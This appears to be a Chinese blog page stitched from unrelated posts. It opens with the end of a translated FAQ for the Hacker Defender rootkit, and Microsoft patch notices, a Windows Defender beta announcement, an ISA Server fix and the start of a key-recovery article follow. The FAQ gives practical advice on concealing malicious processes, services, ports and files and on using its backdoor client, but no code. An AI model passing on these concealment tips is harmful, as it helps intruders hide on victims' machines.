A:这个问题在第五部分,后门章节被提及到。后门需要服务器接收缓冲大于或者等于256个字节,统一,系统的端口可能不工作。如果你遇到了这样的问题,你可以简单的使用NC监听一个你自己的端口,你需要增加这个NC端口到ini文件的Hidden Ports。




5)     当文件在磁盘上是可见的时候,还有什么办法隐藏进程吗?


A:不能,你也不能隐藏在磁盘上文件的进程,当它在认为管理器中是可见的时候



6)     怎么样隐藏svchost.exe和其他我能够在任务管理器上看见的进程?


A:这真的是一个坏的注意,如果你隐藏了系统必需的进程,你的WINDOWS将会马上崩溃。拥有hxdef你不需要命名你那些恶毒的问题为svchost.exe, lsass.exe等。你可以将它命名为任何名字然后在Hidden Table隐藏它。


7)     当我使用DameWare时我能看见所有本应该被隐藏的服务和其他,这是一个bug吗?


A:不是。DameWare或者其他个人使用的远程sessions (或者 netbios)能够看见服务,是因为这个功能还没有实现。它是介于bug和未开发的一个大问题。看网站TODO列表,这些功能还未开发。


8)     但是所有经过netbios的人都能看见我隐藏的文件,我该怎么做?


A:把你的文件深深的放在系统文件夹里面或者不要共享文件夹。


9)     后门客户端不工作。每次看上去好像是OK的,但是连接上以后我不能输入任何东西,整个控制台也是黑色的。我该怎么做?


A:你可能使用了一个错误的端口连接。Hxdef能自动的检测错误的端口并且中断你的连接,但是有时候也许不能检测到你使用错误的端口。所以,请使用一个不同的端口。


10)     什么时候我们能得到新的版本?


A:开发者都是在业余时间开发代码。他们没有从这个上面得到任何的钱而且也不会从这个上面得到钱。现在只有2位代码开发者我们认为这已经足够了。这就意味这我们不会象微软那样快的发布程序,你最好的是等,不要问我们什么时候将会公布新的版本。不像微软,我们的产品都是免费的并且拥有良好的测试人员,我们测试这个程序很多次,所以发布的都是非常的稳定的。


11)     Net.exe命令不能停止隐藏的服务,这是一个bug吗?


A:不是,这不是一个bug,而是它的特征。如果你隐藏了它,只有rootkit的管理员在知道服务名的情况下才能停止它。所以不要恐惧这种方式能发现你。


12)     有什么方法找到rootkit吗?


A:是的。有很多种方式能找出所有的rootkit,这个也不例外。任何的rootkit都能被检测。唯一的问题是在于它的难度和别人用它来做什么。


13)     既然找出hxdef很难,有人能写出一个程序吗?


A:很容易就能发现它,但是我不知道有什么特别的软件能马上告诉你你的机器上面安装有hxdef。


14)     我怎么样才能找出它?


A:我不会告诉你的。呵呵!


15)     版本的数量从0开始是否意味这它没有固定的版本?


A:不。它表示一些小的未开发的东西将会在下次开发被完善。


16)     你什么时候公布源代码?我想阅读1.0.0版本的代码,什么时候公布呢?


A:我真的不知道。在发布1.0.0版本以后有很多的事情需要我去开发。它可能需要6个月或者更长的时间。


17)     我想成为一个测试人员,我该怎么做?


A:你可以写信告诉我你该怎么做,告诉我你作为一个测试人员的工作能力和经验。但是成为一个新的测试人员的机会是相当小的。现在我们有足够的测试人员他们都做得很好,不需要增加人员。


18)     使用hxdef符合法律吗?


A:当然是。但是hxdef经常被用于非法行为。


19)     能否将老的hxdef升级到限制的版本?有办法不需要重新启动机器吗?


A:不可能不需要重启你的电脑,但是你可以手工卸载老的版本进行升级,重启你的电脑进行安装新的版本。


20)     这个版本的hxdef能否升级为以后的新版本?不需要重启电脑可以吗?


A:是的,你可以使用-:uninstall完全移除hxdef的这个版本不需要重启电脑,在安装新的版本。


21)     使用-:uninstall好,还是使用net stop ServiceName好?


A:最好的方式是使用-:uninstall进行卸载,如果有可能的话,不过使用net stop也能得到一样的效果。


22)     我真的很喜欢这个程序,我可以支持你的工作并给你一点捐助吗?


A:我们不需要。但是我们希望你能把钱捐献给你的国家的任何慈善机构,写份MAIL告诉我们关于这件事情。


23)     在哪里可以干部隐藏C:\temp而不是隐藏C:\winnt\temp?


A:不能。创建你自己的文件夹并把名字放在Hidden Table下面。


24)     我在ini文件中找到的密码是明文的,是这样的吗?


A:你可能认为这是一个非常不安全的方法存储密码,但是如果你隐藏你的ini文件没有能够找到,这就是安全的。这个很容易在任何时间进行改变,你可以使用-:refresh非常轻松的改变你的密码


25)     如果我在Hidden Table 隐藏一个监听于某一端口的进程,这个端口也会自动隐藏吗?还是需要在Hidden Ports设置?


A:只有在Hidden Ports列表种的端口才能被隐藏。所以,请把它的端口放在Hidden Ports中。


=====[ 8. 文件 ]===================================================

defender v1.0.0包含下列的原是档案文件:

hxdef100.exe     70 144 b     – Hacker defender v1.0.0程序

hxdef100.ini     3 872 b     -默认的ini设置文件

hxdef100.2.ini     3 695 b     -默认的ini设置文件, 第2类

bdcli100.exe     26 624 b     – 后门客户端

rdrbs100.exe     49 152 b     – redirectors base

readmecz.txt     34 654 b     – 捷克语版说明文件

readmeen.txt     35 956 b     – 英语说明文件

readmefr.txt     38 029 b     – 法语说明文件

src.zip         91 936 b     – 源代码

readmezh.txt     38 029 b     – 中文说明文件


=====[END]====================================================

2006年02月15日

微软上周说将会在本周二也就是2月14日发布二月份的补丁,北京时间的情人节刚过不久微软就已经悄悄的将补丁送达…..请大家尽快安装。早些时候,微软还发布了SMS 2003的SP2。其ISA 2006 Beta也已经开始正式公开测试了,有兴趣的可以去看看。


Windows XP 安全更新程序 (KB911927)(级别:Important)
KB911927 / (MS06-008)

  • Windows Server 2003 (32-bit x86) – 18 languages
  • Windows Server 2003 x64 Edition – 2 languages
  • Windows Server 2003 for Itanium-based Systems – 4 languages
  • Windows XP – 24 languages
  • Windows XP x64 Edition – 2 languages
  • Windows 2000 – 25 languages
    现已确认有一个安全问题,攻击者可能会利用此问题从远程危及 Windows 系统的安全并获取对该系统的控制权.通过安装 Microsoft 提供的本更新程序,可以帮助您保护计算机.安装本更新程序之后,可能需要重新启动计算机.





    Windows XP 安全更新程序 (KB901190)(级别:Important)
    KB901190 / (MS06-009)

  • Windows Server 2003 (32-bit x86) – 18 languages
  • Windows Server 2003 x64 Edition – 2 languages
  • Windows Server 2003 for Itanium-based Systems – 4 languages
  • Windows XP – 24 languages
  • Windows XP x64 Edition – 2 languages
    现已确认有一个安全问题,攻击者可能会利用此问题从远程危及 Windows 系统的安全并获取对该系统的控制权.通过安装 Microsoft 提供的本更新程序,可以帮助您保护计算机.安装本更新程序之后,可能需要重新启动计算机.



    Windows Media Player 插件安全更新程序 (KB911564)(级别:Important)
    KB911564 / (MS06-006)

  • Windows Server 2003 (32-bit x86) – 18 languages
  • Windows Server 2003 x64 Edition – 2 languages
  • Windows XP – 24 languages
  • Windows XP x64 Edition – 2 languages
  • Windows 2000 – 25 languages
    现已确认存在一个安全问题,攻击者可能会远程利用此问题危及使用 Windows Media Player 插件的基于 Windows 的系统的安全并获取对该系统的控制权.通过安装 Microsoft 提供的本更新程序,可以帮助保护您的计算机不受侵害.安装本更新程序之后,可能需要重新启动计算机.



    适用于 Windows XP 的 Windows Media Player 10 安全更新程序 (KB911565)(级别:Critical)
    KB911565 / (MS06-005)

  • Windows Server 2003 (32-bit x86) – 18 languages
  • Windows XP – 24 languages
  • Windows 2000 – 25 languages
    现已确认存在一个安全问题,攻击者可能会远程利用此问题危及使用 Windows Media Player 的基于 Windows 的系统的安全并获取对该系统的控制权.通过安装 Microsoft 提供的本更新程序,可以帮助保护您的计算机不受侵害.安装本更新程序之后,可能需要重新启动计算机.



    Cumulative Security Update for Internet Explorer (910620) (级别:Critical)

    Microsoft Knowledge Base Article 910620 documents the currently known issues that customers may experience when they install this security update. The article also documents recommended solutions for these issues.


    Note The bullet points for Microsoft Windows Server 2003, Microsoft Windows Server 2003 Service Pack 1, and Microsoft Windows Server 2003 x64 Edition also apply to Microsoft Windows Server 2003 R2.

    Windows XP 安全更新程序 (KB913446)(级别:Important)
    KB913446 / (MS06-007)

  • Windows Server 2003 (32-bit x86) – 18 languages
  • Windows Server 2003 x64 Edition – 2 languages
  • Windows Server 2003 for Itanium-based Systems – 4 languages
  • Windows XP – 24 languages
  • Windows XP x64 Edition – 2 languages
    现已确认基于 Windows 的系统中存在一个安全问题,攻击者可能会利用此问题导致受影响的计算机停止响应请求.通过安装 Microsoft 提供的本更新程序,可以帮助保护您的计算机不受侵害.安装本更新程序之后,可能需要重新启动计算机.



    Vulnerability in PowerPoint 2000 Could Allow Information Disclosure (889167) (级别:Important)
    Vulnerability in PowerPoint 2000 Could Allow Information Disclosure (889167)
    Version: 1.0


    Who should read this document: Customers who use Microsoft PowerPoint 2000
    Impact of Vulnerability: Information Disclosure
    Maximum Severity Rating: Important
    Recommendation: Customers should apply the update at the earliest opportunity.
    Security Update Replacement: None
    Caveats: None
    Affected Software:
    • Microsoft Office 2000 Service Pack 3
    • PowerPoint 2000 – Download the update
    Non-Affected Software:
    • Microsoft Office XP Service Pack 3
    • PowerPoint 2002
    • Microsoft Office 2003 Service Pack 1 or Service Pack 2
    • PowerPoint 2003
  • Windows Defender这个名字已经发布了约四个月了,微软于昨日公布了其Beta 2版的下载.
    Windows Defender是Microsoft’s Antispyware的正式名称. 安装Windows AntiSpyware (Beta 1)的用户将会自动升级.此次Beta2一共有三个语言版,英文,德文和日文,并且全球任何地区的电脑都可以安装此版本.


    注意:如在Windows 2000上安装,必须要有SP4,且需要安装一个东西叫GDI+,下载地址见下,下载后是一个压缩包,解开后将其中的一个DLL文件复制到你的系统目录下的SYSTEM32下,就可以了,否则安装会提示“需要GDI+组件”。


    GDI+下载:http://www.microsoft.com/downloads/details.aspx?FamilyID=6a63ab9c-df12-4d41-933c-be590feaa05a&DisplayLang=en

    更新:
    Specific features of Windows Defender Beta 2 include:



    • A redesigned and simplified user interface – Incorporating feedback from our customers, the Windows Defender UI has been redesigned to make common tasks easier to accomplish with a warning system that adapts alert levels according to the severity of a threat so that it is less intrusive overall, but still ensures the user does not miss the most urgent alerts.


    • Improved detection and removal – Based on a new engine, Windows Defender is able to detect and remove more threats posed by spyware and other potentially unwanted software. Real Time Protection has also been enhanced to better monitor key points in the operating system for changes.


    • Protection for all users – Windows Defender can be run by all users on a computer with or without administrative privileges. This ensures that all users on a computer are protected by Windows Defender.


    • Support for 64-bit platforms, accessibility and localization – Windows Defender Beta 2 also adds support for accessibility and 64-bit platforms. Microsoft also plans to release German and Japanese localized versions of Windows Defender Beta 2 soon after the availability of the English versions. Use WindowsDefenderX64.msi for 64-bit platforms.


     

    相关图片








    下载地址: 

     下载:微软官方下载

    2005年10月28日

    在Windows Server 2003 SP1中对RPC服务进行了重大的修改,这和ISA Server的RPC过滤器(rpcFltr.dll)可能会发生冲突,这将导致运行在Windows Server 2003 SP1之上的Outlook 2003不能通过ISA Server连接到Exchange服务器,这个问题可能同样会影响低版本的OUTLOOK。

    所影响的版本:
    • ISA Server 2000
    • ISA Server 2004 Standard Edition
    • ISA Server 2004 with Service Pack 1
    • ISA Server 2004 Enterprise Edition


    在工作环境中,你可以禁止RPC过滤器来解决这一问题,通过安装补丁程序,你可以不用禁止RPC补丁。

    补丁下载:
    ISA2000:http://www.microsoft.com/downloads/details.aspx?FamilyID=515549e0-7843-4e30-992a-a6376ef7f583&DisplayLang=en


    ISA2004 SE:http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyID=0b3b8b50-9a7a-43ca-8e30-ccfcd8ad5fa3


    ISA2004 EE:http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyID=d8d433fb-3e2f-4223-8935-a76b18ef84cd



    版权:本文版权属作者,转载请注明出处

    很久之前就答应devilman要写一个关于KRA的文章,无奈由于大连的课程一直很多,一直也没有环境和时间去研究,今天课程快结束了,我搭建了完整的实验环境,终于有时间研究了一下WIN2003 EE的CA里的新功能–KRA(密钥恢复代理)的使用,写了这个文章,还将继续完成从EXCHANGE 2000 KMS到WIN 2003 CA的迁移。本打算只写一个的,看来不能了,因为内容太多了,只好改成连载了,呵呵……,另外,本文不讨论过多的KRA技术的原理,有对技术原理感兴趣的,可以仔细阅读下面的参考文章,本文只对KRA在实际操作中的实战做分析,请谅解。

    首先给出原文的参考文章:Key Archival and Management in Windows Server 2003

    这篇文章是英文的,且很难看明白(可能是我的水平不够吧),郁闷……

    一、KRA证书的申请
    申请证书之前,首先需要建立和安装企业根CA(独立根CA不能建立KRA证书),怎么安装这个不用说了吧。呵呵。。
    安装CA后,你需要在证书模板中要选择上密钥恢复代理。否则不能申请该证书。
    1、通过证书管理单元申请
    归类于: Active Directory, Security, Windows 2003 — yinjie[Exchange MVP] @ 3:35 pm 评论(0)